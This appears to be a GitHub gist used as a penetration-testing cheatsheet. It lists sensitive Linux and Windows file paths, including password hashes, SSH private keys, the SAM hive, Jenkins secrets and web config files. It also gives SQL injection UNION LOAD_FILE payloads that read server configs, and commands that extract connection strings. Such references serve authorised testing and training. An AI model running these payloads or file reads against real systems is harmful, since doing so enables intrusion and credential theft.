Skip to content

Instantly share code, notes, and snippets.

@strikoder
Last active December 1, 2025 20:29
Show Gist options
  • Select an option

  • Save strikoder/ef3463fcde21761e40df508bb03ccce4 to your computer and use it in GitHub Desktop.

Select an option

Save strikoder/ef3463fcde21761e40df508bb03ccce4 to your computer and use it in GitHub Desktop.
Windows & Linux sensitive file paths for penetration testing - includes webroot locations, config files, logs, and SQL injection LOAD_FILE payloads for common services (IIS, Apache, Nginx, XAMPP, WAMP, Jenkins, FTP, SSH)

Linux & Windows Sensitive Paths Cheatsheet

LINUX

Files

/etc/passwd
/etc/shadow
/etc/profile
/etc/issue
/etc/os-release
/etc/hosts
/etc/vsftpd.conf
/etc/ftpusers
/etc/ssh/sshd_config
/etc/apache2/apache2.conf
/etc/apache2/sites-available/000-default.conf
/etc/php/7.4/apache2/php.ini
/etc/php/8.1/apache2/php.ini
/etc/php/8.2/apache2/php.ini
/etc/nginx/nginx.conf
/etc/nginx/sites-enabled/default
/etc/mysql/my.cnf
/etc/mysql/mariadb.conf.d/50-server.cnf
/etc/freeswitch/autoload_configs/event_socket.conf.xml
/proc/self/environ
/proc/self/cmdline
/proc/version
/root/.bash_history
/root/.ssh/id_rsa
/home/<user>/.bash_history
/home/<user>/.profile
/home/<user>/.bashrc
/home/<user>/.ssh/id_rsa
/var/mail/root
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/apache2/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/mail
/var/log/dmessage
/var/www/config.php
/var/www/html/config.py
/var/jenkins_home/users/users.xml
/var/jenkins_home/users/<user_directory>/config.xml
/var/jenkins_home/secrets/master.key
/.git/config
/.env
/config.php
.htaccess

Directories

/var/www/html/
/var/www/
/var/www/sites/
/var/www/public/
/var/www/public_html/
/var/www/html/default/
/var/www/dav
/srv/www/
/srv/www/html/
/srv/www/sites/
/home/www/
/home/httpd/
/home/$USER/public_html/
/home/$USER/www/
/inetpub/wwwroot
/usr/local/nginx/html/
/usr/local/nginx/conf
/etc/nginx
/usr/local/etc/nginx
/.git/
/backup/
/bak/
/old/

WINDOWS

Files

\Windows\win.ini
C:\Windows\win.ini
C:\Unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\Panther\Autounattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
C:\Windows\System32\config\SAM
C:\windows\system32\drivers\etc\hosts
C:\users\[]\.ssh\id_rsa
C:\inetpub\wwwroot\web.config
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
%WinDir%\System32\inetsrv\config\ApplicationHost.config
C:\xampp\apache\logs\access.log
C:\wamp\app\wordpress\wp-config.php
C:\wamp\alias\phpmyadmin.conf
C:\Program Files(x86)\hMailServer\Bin\hMailServer.ini

Directories

C:\inetpub\logs\LogFiles\W3SVC1
C:\inetpub\wwwroot\
C:\xampp\htdocs\
C:\wamp\www\
C:\wamp\app

SQLI LOAD_FILE Payloads (Linux)

c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/mysql/my.cnf')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/apache2/apache2.conf')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/apache2/sites-enabled/000-default.conf')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/php/7.4/apache2/php.ini')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/php/8.1/apache2/php.ini')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/proc/version')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/os-release')#
c' UNION ALL SELECT 1,2,3,4,LOAD_FILE('/etc/mysql/mariadb.conf.d/50-server.cnf')#

Useful Commands

Windows

type C:\inetpub\wwwroot\web.config | findstr connectionString
type C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config | findstr connectionString
type C:\wamp\app\wordpress\wp-config.php
type C:\wamp\alias\phpmyadmin.conf

Linux

cat /etc/vsftpd.conf | grep -v "#"
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment